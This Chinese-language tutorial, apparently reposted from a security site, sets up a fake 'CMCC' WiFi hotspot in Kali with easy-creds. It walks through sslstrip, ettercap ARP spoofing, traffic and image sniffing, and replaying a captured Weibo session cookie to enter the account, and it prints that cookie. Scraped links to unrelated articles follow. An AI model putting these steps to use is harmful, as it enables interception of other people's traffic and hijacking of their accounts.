如何在Kali Linux中搭建钓鱼热点

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!

0×00 实验环境

操作系统:Kali 1.0 (VM)

FackAP: easy-creds

硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱)

靶机:安卓、iPhone设备

0×01 环境搭建

git clone https://github.com/brav0hax/easy-creds
cd easy-creds

bash install.sh

选择第一项:1.  Debian/Ubuntu and derivatives

这一步设定easy-creds的安装目录:/opt ,安装过程中会从国外网站下载一些依赖包以及第三方软件,这一过程中建议通过FQ来节省时间。

当看到提示happy hunting的时候便意味着安装完成了:

0×02

根据上述步骤已将easy-creds安装到Kali中,我们可以在终端执行easy-creds运行,接下来我们需要对软件、系统参数进行一些修改:

2.1 修改etter uid、gid值 &开启iptables端口转发

kali中自带了中间人攻击的一些工具,如:ettercap,在第一次使用ettercap时,我们需要修改其默认配置文件/etc/ettercap/etter.conf: (有的系统中,ettercap的配置文件路径为:/etc/etter.conf)

需要我们把ettercap的ec_uid、ec_gid的值修改为0:以系统最高权限运行。

另外,如果系统使用了iptables防火墙,还需取消#后的注释使iptables配置生效,将:

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

修改为:

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

2.2 开启ipv4数据包转发:

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.3 配置iptables规则:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

2.4 运行sslstrip

sslstrip -l 8080

2.5 开启网络管理 &重启网络管理服务

vim /etc/NetworkManager/NetworkManager.conf

将managed=false修改为managed=true:

重启网络管理服务:

service network-manager restart

0×03 运行easy-creds

终端执行:easy-creds

选择第三项:FakeAP Attacks

选择第一项:FakeAP Attack Static

y确定包含sidejacking劫持攻击:

下一步选择WIFI网络的流量入口:eth0

选择无线网络接口&设备:wlan0

设定WIFI-SSID:CMCC

WIFI网络信道:5

mon0

n

at0

n

为无线网络设置网段:192.168.88.0/24

设定DNS服务器:8.8.8.8

完成之后,easy-creds启动了Airbase-NG、DMESG、SSLStrip、Ettercap tunnel、URL snarf、Dsniff等工具:

红色部分显示安卓、iPhone靶机成功连入钓鱼WIFI环境,URL snarf也捕获到了两台设备正在访问的网站网址等信息。

0×04 Hacking for fun

4.1 “绵羊墙”

driftnet是一款简单而使用的图片捕获工具,能够捕获到网络数据包中的图片,同时支持抓取和显示音频文件,可用于捕获微信朋友圈中的相片、微博配图等等。

driftnet -i at0   (-i指定监听的网络接口)

4.2 MITM中间人攻击

Ettercap利用ARP欺骗,监听同一网段内某台主机甚至所有主机的网络通信流量,抓取其它主机通信流量中的Cookie等信息:

ettercap -i at0 -T -M arp:remote /192.168.88.1/ //  (通过ARP欺骗,监听192.168.88.0/24 网段所有主机通信流量)

4.3 利用Cookie登陆受害者账户

利用Cookie前,我们需要下载浏览器的一些Cookie相关的插件,如cookie manager、cookie editor。

这里我使用了:Modify Headers for Google Chrome

4.3.1 捕获到的微博Cookie数据:

Wed Jul 20 11:27:50 2016
TCP  192.168.88.100:50664 --> 180.149.139.248:80 | AP

GET /unread?t=1468985586846 HTTP/1.1.
Host: m.weibo.cn.
Connection: keep-alive.
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.19.815 Mobile.
Cookie: H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.
Accept: application/json, text/javascript, */*; q=0.01.
X-Requested-With: XMLHttpRequest.
Accept-Language: zh-cn.
Referer: http://m.weibo.cn/.
Accept-Encoding: gzip,deflate.
.

4.3.2 清空浏览器内weibo.cn的Cookie:

4.3.3 导入微博Cookie

选择右上角+ 增加Cookie:

Action=Modify 
Name=Cookie
Value=H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.

4.3.4 访问m.weibo.cn:

0×05 嗅探数据包&协议分析

5.1 wireshark

5.2 tcpdump

tcpdump -i at0 -w sniffe.dump

5.3 ssltrips嗅探https加密流量

捕获HTTPS通信传输中的账号、密码:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
ssltrips -p -l 8080 -w log.txt

0×06 注意事项

1.easy-creds生成的日志文件过大,建议在/tmp目录中启动easy-creds(即使忘了删easy-creds日志,系统重启后自动清空/tmp目录)

2.如果连入钓鱼热点的设备不能联网了及时检查:/proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

当发现值为0的时候需再次执行:

echo 1 >> /proc/sys/net/ipv4/ip_forward

3.easy-creds目前不兼容kali 2.0,所以不建议在kali 2.0 系统中安装easy-creds;

4.目前测试easy-creds只支持移动设备接入WIFI,测试过程中发现笔记本(win 7)接入WIFI不能联网。

0×07 安全建议

1.不随便连陌生 WIFI,及时注销登录状态可使Cookie时效;

2.不使用WIFI时及时关闭手机WIFI,避免自动连入诸如CMCC这一类的公共开放无线热点。

0×08 refer

Ettercap Man In The MIddle Attack + SSL Strip

原文地址:http://www.freebuf.com/articles/wireless/108830.html

时间: 2024-10-16 02:44:52

如何在Kali Linux中搭建钓鱼热点的相关文章

小技巧:如何在 Kali Linux 中安装 Google Chrome 浏览器

下载 Google Chrome 首先,使用 wget 命令来下载最新版本的 Google Chrome 的 debian 安装包. # wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb 安装 Google Chrome 在 Kali Linux 安装 Google Chrome 最容易的方法就是使用 gdebi,它会自动帮你下载所有的依赖包. # gdebi google-chrome-

在Kali Linux中更改GRUB2背景的5种方式

这是一个关于如何在 Kali Linux 中更改 GRUB 背景的简单指南(实际上它是 Kali Linux 的 GRUB 启动图像). Kali 开发团队在这方面做的不多,他们好像太忙了,所以在这篇文章中,我会对 GRUB 解释一二,但是不会冗长到我失去写作的激情. 那么我们开始吧-- 这通常是所有人首先会遇到的一个问题,在哪里设置?有很多方法来查找 GRUB 设置.每个人都可能有自己的方法,但我发现 update-grub 是最简单的.如果在 VMWare 或 VirtualBox 中执行

在 Kali Linux 中更改 GRUB2 背景的 5 种方式

这是一个关于如何在 Kali Linux 中更改 GRUB 背景的简单指南(实际上它是 Kali Linux 的 GRUB 启动图像). Kali 开发团队在这方面做的不多,他们好像太忙了,所以在这篇文章中,我会对 GRUB 解释一二,但是不会冗长到我失去写作的激情. 那么我们开始吧-- 这通常是所有人首先会遇到的一个问题,在哪里设置?有很多方法来查找 GRUB 设置.每个人都可能有自己的方法,但我发现 update-grub 是最简单的.如果在 VMWare 或 VirtualBox 中执行 

如何在 Windows 10 中搭建 Node.js 环境?

[编者按]本文作者为 Szabolcs Kurdi,主要通过生动的实例介绍如何在 Windows 10 中搭建 Node.js 环境.文章系国内 ITOM 管理平台 OneAPM 编译呈现. 在本文中,笔者将展示如何在 Windows 10 中搭建 Node.js 环境.并且,作为检验,笔者会在新搭建的环境中运行自己正在努力的一个项目(该项目依赖于 koa, pg, amqplib 等模块). 请注意:本文的首要目的是为 Node.js 项目搭建开发者环境,而非运行某个项目.笔者随后会介绍如何部

如何在Kali Linux上编译Windows漏洞!

Mingw-w64是一个用于创建Windows应用程序的自由和开源软件开发环境. Mingw-w64最初叫Mingw32,它当时不支持64位架构. 在本教程中,我们将讨论如何使用Mingw-64在 Kali Linux上编译Windows漏洞. 让我们开始在Kali Linux上安装Mingw-w64. 1.在Kali Linux上安装Mingw-w64 默认情况下,Kali Linux 2016.2和更低版本上未安装Mingw-w64. 因此,我们需要先安装它,然后才能在Linux上编译Win

如何在Kali Linux环境下设置蜜罐

Pentbox 是一个包含了许多可以使渗透测试工作变得简单流程化的工具的安全套件.它是用 Ruby 编写并且面向 GNU / Linux,同时也支持 Windows.MacOS 和其它任何安装有 Ruby 的系统.在这篇短文中我们将讲解如何在 Kali Linux 环境下设置蜜罐.如果你还不知道什么是蜜罐honeypot,"蜜罐是一种计算机安全机制,其设置用来发现.转移.或者以某种方式,抵消对信息系统的非授权尝试." 下载 Pentbox: 在你的终端中简单的键入下面的命令来下载 pe

如何在 CentOS Linux 中配置 MariaDB 复制

如何在 CentOS Linux 中配置 MariaDB 复制 这是一个创建数据库重复版本的过程.复制过程不仅仅是复制一个数据库,同时也包括从主节点到一个从节点的更改同步.但这并不意味着从数据库就是和主数据库完全相同的副本,因为复制可以配置为只复制表结构.行或者列,这叫做局部复制.复制保证了特定的配置对象在不同的数据库之间保持一致. Mariadb 复制概念 备份 :复制可以用来进行数据库备份.例如,当你做了主->从复制.如果主节点数据丢失(比如硬盘损坏),你可以从从节点中恢复你的数据库. 扩展

Kali Linux中的十大WiFi攻击工具介绍

本文讲的是Kali Linux中的十大WiFi攻击工具介绍,在这十大WiFi攻击黑客工具中,我们将讨论一个非常受欢迎的主题:无线网络攻击以及如何防止黑客入侵.无线网络通常是网络的一个弱点,因为WiFi信号可以随处可见,任何人都可以使用.还有很多路由器包含漏洞,可以利用正确的设备和软件(如Kali Linux附带的工具)轻松利用漏洞.许多路由器制造商和ISP仍然默认在其路由器上启用了WPS,这使得无线安全和渗透测试变得更加重要.通过以下十大无线网络黑客工具,你可以测试我们自己的无线网络以获取潜在的

OpenVAS:Kali Linux 中的漏洞评估工具

本教程将介绍在 Kali Linux 中安装 OpenVAS 8.0 的过程. OpenVAS 是一个可以自动执行网络安全审核和漏洞评估的开源漏洞评估程序.请注意,漏洞评估(Vulnerability Assessment)也称为 VA 并不是渗透测试(penetration test),渗透测试会进一步验证是否存在发现的漏洞,请参阅什么是渗透测试来对渗透测试的构成以及不同类型的安全测试有一个了解. 什么是 Kali Linux? Kali Linux 是 Linux 渗透测试分发版.它基于 D